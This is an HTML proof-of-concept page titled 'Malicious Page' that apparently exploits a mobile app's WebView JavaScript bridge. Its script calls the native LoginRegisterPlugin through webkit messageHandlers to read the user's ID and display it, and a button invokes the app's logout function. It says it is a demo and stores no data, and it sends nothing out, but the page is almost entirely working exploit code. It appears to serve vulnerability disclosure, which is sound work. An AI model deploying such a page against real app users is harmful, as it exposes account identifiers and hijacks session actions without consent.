<!DOCTYPE html>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" charset="UTF-8">
    <style>
        body {
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }

        .container {
            width: 100%;
            padding: 15px;
        }

        @media screen and (min-width: 700px) {
            .container {
                width: 70%;
                margin: auto;
            }
        }

        p {
            white-space: pre-wrap; 
            word-wrap: break-word; 
            overflow-wrap: break-word; 
        }

        .bold-and-larger {
            font-weight: bold; 
            font-size: 1.5em; 
        }

        .larger {
            font-weight: bold; 
            font-size: 1.2em; 
        }

    </style>
    <title>Malicious Page</title>

</head>


<body>
    <h1>Malicious Page</h1>

    <p>!!! This is just a demo page, NO Sensitive Data will be stored!!!</p>

    <p><span class="bold-and-larger">An attacker can:</span></p>

    <p><span class="larger">Get Your Account Info:</span></p>
    <p style="font-size: 15px;" id="UserID"></p>
    <p style="font-size: 15px;" id="UmidToken"></p>
    <p style="font-size: 15px;" id="AuthCode"></p>

    <p><span class="larger">Log Out Your Account:</span></p>
    <input type="button" value="Log Out" id="LogOut" style="font-size: 20px; padding: 20px 25px;"/>

    <br>
    <script>

    window.plus = {}
    window.plus.JSbridgeForOC = {}
    window.plus.JSbridgeForOC.callbackAsyn = function(callbackID, bool, res){
        var json = res;
        switch(callbackID){
            case "cb_getUserInfo":
                document.getElementById("UserID").innerText = "Your UserID: " + json.userId;
                break;
        }
    }

    window.webkit.messageHandlers.OCBridgeForJS.postMessage({
        jscall: "{\"pluginName\":\"LoginRegisterPlugin\",\"functionName\":\"getUserInfo\",\"arguments\":[\"cb_getUserInfo\",true,true,true,null,null],\"callID\":\"cb_getUserInfo\"}",
        name: "callAsyn"
    });

    document.getElementById("LogOut").onclick = function () {
        window.webkit.messageHandlers.OCBridgeForJS.postMessage({
            jscall: "{\"pluginName\":\"LoginRegisterPlugin\",\"functionName\":\"logOutAction\",\"arguments\":[\"cb_logOutAction\",true,true,true,null,null],\"callID\":\"cb_logOutAction\"}",
            name: "callAsyn"
        });
    }





    </script>

</body>

</html>